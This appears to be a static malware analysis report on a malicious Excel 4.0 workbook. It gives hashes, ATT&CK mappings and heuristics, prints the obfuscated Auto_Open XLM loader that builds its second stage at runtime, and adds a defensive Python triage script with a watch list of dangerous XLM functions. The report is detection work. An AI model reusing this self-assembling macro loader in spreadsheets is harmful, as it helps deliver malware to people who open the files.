Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a3ff153a57ef9560…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 36.0 KB
Created: 2020-11-25 10:24:40
Authoring application: Microsoft Excel
First seen: 2021-08-25
MD5: 9bd29c285d17653f64ec22bb19faaab1
SHA-1: 4a4dd7138af03bdb110ca37bcf11818283bfb849
SHA-256: a3ff153a57ef9560c60d439cee5150b45740003160b7b9ffa27cc90989933091
Risk Score: 140

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic (Excel 4.0 / XLM macro execution)
T1204.002 User Execution: Malicious File (the macro runs only after the user opens the workbook and allows macros; no client-side vulnerability is exploited, so T1203 does not apply)

The workbook contains an Excel 4.0 macro sheet (KWXPBKciZCp) and an Auto_Open defined name, so the macro runs as soon as the workbook is opened and macros are allowed. The recovered listing does not show a RUN or EXEC call in clear text; what it shows is a decode loop: counters and intermediate values are held in SET.NAME aliases with randomized names, HLOOKUP reads values out of a data range by index, and FORMULA() writes the computed result into cells, i.e. the visible macro assembles its second-stage formulas at runtime instead of carrying them in the file. Control is then handed to the assembled routine through a defined name (SET.NAME("kXjqeHRZ",B74) followed by kXjqeHRZ()). This is the pattern the 'XLM Auto_Open with dangerous formula APIs' heuristic keys on, and the staged routine is typically a download-and-execute step, but the payload is not present in the static listing, so no URL, dropped-file name or C2 indicator can be taken from this sample alone; dynamic analysis or emulation of the XLM is needed to recover the next stage.

Heuristics (3)

  • Excel 4.0 Auto_Open defined name [critical] OLE_XLM_AUTOOPEN_DEFINEDNAME
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF NAME record stores the name in tokenized form, so a plain byte-string search for "Auto_Open" can miss it; the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • XLM Auto_Open with dangerous formula APIs [critical] OLE_XLM_DANGEROUS_FN
    The Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry together with XLM formula APIs that can invoke programs, write files, or write new formulas into cells and transfer control to them, all without any VBA.
  • Excel 4.0 (XLM) macro sheet present [medium] OLE_XLM_AUTOOPEN
    The workbook contains an Excel 4.0 macro sheet sub-stream. XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: xlm_macros.txt
Kind: xlm-macro
Source: oletools.olevba.extract_all_macros (XLM macro listing)
Size: 6649 bytes
SHA-256: a73b2acd4919583d34b41cf8a6e34f713b45ad93f1f69a8a5fafe0f619d9a056

Preview (first 1,000 lines of the extracted listing):
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     20 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  KWXPBKciZCp
' 0018     21 LABEL : Cell Value, String Constant - ASFpHZ len=0 
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  Sheet!B170 
' 0018     22 LABEL : Cell Value, String Constant - dxNRYMI len=0 
' 0018     24 LABEL : Cell Value, String Constant - FbdKOsLXW len=0 
' 0018     26 LABEL : Cell Value, String Constant - fFPTHSHpuCt len=0 
' 0018     23 LABEL : Cell Value, String Constant - FXcaLyNG len=0 
' 0018     20 LABEL : Cell Value, String Constant - hWWEt len=0 
' 0018     22 LABEL : Cell Value, String Constant - iMLoSSI len=0 
' 0018     24 LABEL : Cell Value, String Constant - iYgrQdXsx len=0 
' 0018     23 LABEL : Cell Value, String Constant - kXjqeHRZ len=0 
' 0018     26 LABEL : Cell Value, String Constant - MeZgwToHrBz len=0 
' 0018     24 LABEL : Cell Value, String Constant - MLhuoaufu len=0 
' 0018     21 LABEL : Cell Value, String Constant - MqhluP len=0 
' 0018     27 LABEL : Cell Value, String Constant - NwjjCQuidPDF len=0 
' 0018     24 LABEL : Cell Value, String Constant - pVqTzTcFz len=0 
' 0018     26 LABEL : Cell Value, String Constant - QbMVroypDsR len=0 
' 0018     26 LABEL : Cell Value, String Constant - rlNqIOBWvor len=0 
' 0018     24 LABEL : Cell Value, String Constant - vZXHdsWVt len=0 
' 0018     26 LABEL : Cell Value, String Constant - WrkXZCXnCxV len=0 
' 0018     24 LABEL : Cell Value, String Constant - ZANNvikhX len=0 
' 0018     20 LABEL : Cell Value, String Constant - ZQTDR len=0 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
'  KWXPBKciZCp,B74,"SET.NAME("ASFpHZ",VALUE("0"))",""
'  KWXPBKciZCp,B77,"SET.NAME("rlNqIOBWvor",ASFpHZ)",""
'  KWXPBKciZCp,B81,"SET.NAME("iMLoSSI",ASFpHZ)",""
'  KWXPBKciZCp,B85,"SET.NAME("hWWEt",COUNTA(MeZgwToHrBz))",""
'  KWXPBKciZCp,B88,"SET.NAME("WrkXZCXnCxV",COUNTA(dxNRYMI))",""
'  KWXPBKciZCp,B90,[],""
'  KWXPBKciZCp,B95,"SET.NAME("pVqTzTcFz","")",""
'  KWXPBKciZCp,B99,"rlNqIOBWvor",""
'  KWXPBKciZCp,B101,"SET.NAME("MLhuoaufu",HLOOKUP("*",MeZgwToHrBz,rlNqIOBWvor,FALSE))",""
'  KWXPBKciZCp,B104,"NwjjCQuidPDF",""
'  KWXPBKciZCp,B107,"SET.NAME("QbMVroypDsR",ASFpHZ)",""
'  KWXPBKciZCp,B111,[],""
'  KWXPBKciZCp,B116,"QbMVroypDsR",""
'  KWXPBKciZCp,B120,"FbdKOsLXW",""
'  KWXPBKciZCp,B123,"iYgrQdXsx",""
'  KWXPBKciZCp,B128,"ZQTDR",""
'  KWXPBKciZCp,B131,"SET.NAME("FXcaLyNG",VALUE(HLOOKUP("*",dxNRYMI,ZQTDR,FALSE)))",""
'  KWXPBKciZCp,B134,"vZXHdsWVt",""
'  KWXPBKciZCp,B138,"pVqTzTcFz",""
'  KWXPBKciZCp,B142,"iMLoSSI",""
'  KWXPBKciZCp,B147,NEXT(),""
'  KWXPBKciZCp,B149,"MqhluP",""
'  KWXPBKciZCp,B152,"SET.NAME("f",INT(T(FORMULA(T(pVqTzTcFz)&"",""&T(MqhluP)))))",""
'  KWXPBKciZCp,B157,"fFPTHSHpuCt",""
'  KWXPBKciZCp,B162,NEXT(),""
'  KWXPBKciZCp,B166,RETURN(),""
'  KWXPBKciZCp,B192,"SET.NAME("kXjqeHRZ",B74)",""
'  KWXPBKciZCp,B197,"MeZgwToHrBz",""
'  KWXPBKciZCp,B199,"SET.NAME("dxNRYMI",R70C13)",""
'  KWXPBKciZCp,B202,"SET.NAME("fFPTHSHpuCt",208)",""
'  KWXPBKciZCp,B205,"SET.NAME("ZANNvikhX",2)",""
'  KWXPBKciZCp,B207,kXjqeHRZ(),""
'  KWXPBKciZCp,B208,HALT(),""
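The three heuristics above can be reproduced over the extracted listing itself. The following is an added example written for this report, not code from oletools or from the scanner that produced the verdict: it parses a constructed subset of the olevba XLM listing shown above (the BIFF Auto_Open name line plus a handful of the formula rows), flags the auto-execution entry, counts uses of dangerous XLM functions, collects the SET.NAME aliases, and resolves the control transfer through the defined name kXjqeHRZ back to cell B74. The DANGEROUS_FN list and the severity ladder are this example's own choices, not the report's rule set.

```python
"""Triage an olevba XLM macro listing for auto-exec entries and dangerous formula APIs."""
import re
from collections import Counter

# Constructed input: a subset of the listing olevba emitted for this sample
# (one BIFF NAME comment line, the CSV header, and selected formula rows).
LISTING = """\
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  Sheet!B170
' Sheet,Reference,Formula,Value
'  KWXPBKciZCp,B74,"SET.NAME("ASFpHZ",VALUE("0"))",""
'  KWXPBKciZCp,B90,[],""
'  KWXPBKciZCp,B101,"SET.NAME("MLhuoaufu",HLOOKUP("*",MeZgwToHrBz,rlNqIOBWvor,FALSE))",""
'  KWXPBKciZCp,B147,NEXT(),""
'  KWXPBKciZCp,B152,"SET.NAME("f",INT(T(FORMULA(T(pVqTzTcFz)&"",""&T(MqhluP)))))",""
'  KWXPBKciZCp,B166,RETURN(),""
'  KWXPBKciZCp,B192,"SET.NAME("kXjqeHRZ",B74)",""
'  KWXPBKciZCp,B199,"SET.NAME("dxNRYMI",R70C13)",""
'  KWXPBKciZCp,B207,kXjqeHRZ(),""
'  KWXPBKciZCp,B208,HALT(),""
"""

# Assumed watch-list: XLM functions that run programs, touch files, or write
# formulas into cells (FORMULA / FORMULA.FILL are how a decoded stage is staged).
DANGEROUS_FN = {
    "EXEC", "RUN", "CALL", "REGISTER", "FORMULA", "FORMULA.FILL",
    "FOPEN", "FWRITE", "FWRITELN", "FREAD", "FREADLN", "SEND.KEYS",
    "SET.VALUE", "ON.TIME", "ALERT",
}
CONTROL_FLOW = {"NEXT", "RETURN", "HALT"}

AUTOEXEC_LINE = re.compile(r"built-in-name \d+ (Auto_\w+) .*?(\S+![A-Z]+\d+)")
FORMULA_ROW = re.compile(r"^'\s*([^,\s]+),([A-Z]+\d+),(.*),\"\"\s*$")
FN_CALL = re.compile(r"\b([A-Z][A-Z0-9.]*)\(")      # built-in XLM function name
NAME_CALL = re.compile(r"^([A-Za-z_]\w*)\(\)$")      # bare call, e.g. kXjqeHRZ()
SET_NAME = re.compile(r'^SET\.NAME\("([^"]+)",(.*)\)$')


def parse_listing(text):
    """Return ({auto-exec name: target cell}, [(sheet, cell, formula), ...])."""
    autoexec, rows = {}, []
    for line in text.splitlines():
        m = AUTOEXEC_LINE.search(line)
        if m:
            autoexec[m.group(1)] = m.group(2)
            continue
        m = FORMULA_ROW.match(line)
        if not m:
            continue
        sheet, cell, formula = m.groups()
        # olevba wraps formulas in quotes without escaping inner quotes, so
        # only the outermost pair is stripped.
        if len(formula) >= 2 and formula[0] == formula[-1] == '"':
            formula = formula[1:-1]
        rows.append((sheet, cell, formula))
    return autoexec, rows


def triage(text):
    """Apply the report's three checks to a listing and return a findings dict."""
    autoexec, rows = parse_listing(text)
    aliases = {}            # defined name -> expression/cell assigned via SET.NAME
    dangerous = Counter()   # dangerous function -> number of formulas using it
    name_calls = []         # (cell, name, resolved target): control transfer via a name
    for _sheet, cell, formula in rows:
        m = SET_NAME.match(formula)
        if m:
            aliases[m.group(1)] = m.group(2)
        for fn in FN_CALL.findall(formula):
            if fn in DANGEROUS_FN:
                dangerous[fn] += 1
        m = NAME_CALL.match(formula)
        if m and m.group(1).upper() not in CONTROL_FLOW:
            name_calls.append((cell, m.group(1), aliases.get(m.group(1), "?")))
    if autoexec and dangerous:
        severity = "critical"     # auto-exec entry plus dangerous API, as in this report
    elif autoexec or dangerous:
        severity = "high"
    elif rows:
        severity = "medium"       # XLM sheet present but nothing worse seen
    else:
        severity = "none"
    return {
        "xlm_sheet_present": bool(rows),
        "autoexec": autoexec,
        "dangerous_fn": dict(dangerous),
        "aliases": aliases,
        "name_calls": name_calls,
        "severity": severity,
    }


if __name__ == "__main__":
    for key, value in triage(LISTING).items():
        print(f"{key}: {value}")
```

On the subset above the result is severity "critical", with Auto_Open resolving to Sheet!B170, FORMULA as the only dangerous function, and the call at B207 resolved to B74 through the kXjqeHRZ alias. In practice the input is the listing `olevba` prints for an .xls; a row whose formula is only a defined name (such as B99 or B116 in the full listing) is a reference to an alias, not a call, and is deliberately left out of name_calls.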